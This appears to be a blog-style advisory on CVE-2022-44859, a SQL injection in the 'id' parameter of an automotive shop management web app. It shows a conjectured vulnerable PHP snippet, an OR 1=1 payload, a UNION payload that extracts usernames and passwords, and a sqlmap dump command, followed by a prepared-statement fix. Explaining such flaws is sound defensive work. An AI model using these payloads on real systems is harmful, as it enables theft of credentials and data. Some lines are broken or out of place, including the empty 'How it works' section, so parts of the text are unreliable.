CVE-2022-44859 - Exploiting a SQL Injection in Automotive Shop Management System v1.

Cybersecurity continues to be a challenging field, especially for small-to-medium businesses that rely on off-the-shelf software like the Automotive Shop Management System (ASMS) v1.. In this post, we take a deep dive into a critical vulnerability—CVE-2022-44859—which enables attackers to manipulate the web app's database through a simple request.

Let's break down how this SQL injection works, how you can test it, and what you should do to fix it.

Vulnerable Parameter: id

- Vulnerable File: /asms/admin/products/manage_product.php

How the Vulnerability Works

When an application takes user input and inserts it into a SQL query without proper validation or escaping, attackers can craft input that changes the structure of the SQL statement. This is called SQL Injection.

In ASMS v1., when accessing the admin product management page with an id parameter, the application inserts the value directly into a SQL query.

Example URL

http://yourserver/asms/admin/products/manage_product.php?id=1

But what if, instead of a normal ID, an attacker sends SQL code?

The Vulnerable Source Code

From online sources and a typical pattern in such applications, the PHP code might look like this:

<?php
if(isset($_GET['id'])) {
    $id = $_GET['id'];
    $query = "SELECT * FROM products WHERE id = $id";
    $result = mysqli_query($conn, $query);
    // ...
}
?>

*Note:* The above code does not use prepared statements or input validation.

With the lack of sanitization, an attacker can craft a malicious id value, such as

1 OR 1=1

So, visiting...

http://yourserver/asms/admin/products/manage_product.php?id=1 OR 1=1

...executes this SQL

SELECT * FROM products WHERE id = 1 OR 1=1

This query returns all products, not just one. With further crafting, attackers can dump, alter, or even delete data.

### More Advanced Attack (Dumping Usernames/Passwords)

Suppose the attacker wants to leak sensitive data from a users table using SQL injection with a UNION attack:

http://yourserver/asms/admin/products/manage_product.php?id=-1 UNION SELECT 1, username, password, 4, 5 FROM users --

How it works:

Automated Exploit with sqlmap

Open-source tools like sqlmap make this even easier.

sqlmap -u "http://yourserver/asms/admin/products/manage_product.php?id=1" --dump

*This command auto-detects the injection and can extract sensitive data!*

References

- NVD - CVE-2022-44859
- Exploit DB - 51051
- Original project on Sourcecodester
- OWASP SQL Injection Cheat Sheet

How to Fix

Never put user input directly in SQL queries. Always use parameterized queries (prepared statements).

Secure PHP Code Example

<?php
if(isset($_GET['id'])) {
    $id = $_GET['id'];
    $stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $result = $stmt->get_result();
    // ...
}
?>

Gain full control through database injection

Small changes in code can protect your business from losing trust, money, and confidential customer data.

Final Thoughts

CVE-2022-44859 is a warning: never trust user input. If you run Automotive Shop Management System or similar web apps, check your source code for unsafe patterns, and always keep your software up-to-date.

Stay safe and happy coding!

*Exclusively by Assistant. For more details, visit the official NVD entry.*

Timeline

Published on: 11/25/2022 18:15:00 UTC
Last modified on: 11/28/2022 19:45:00 UTC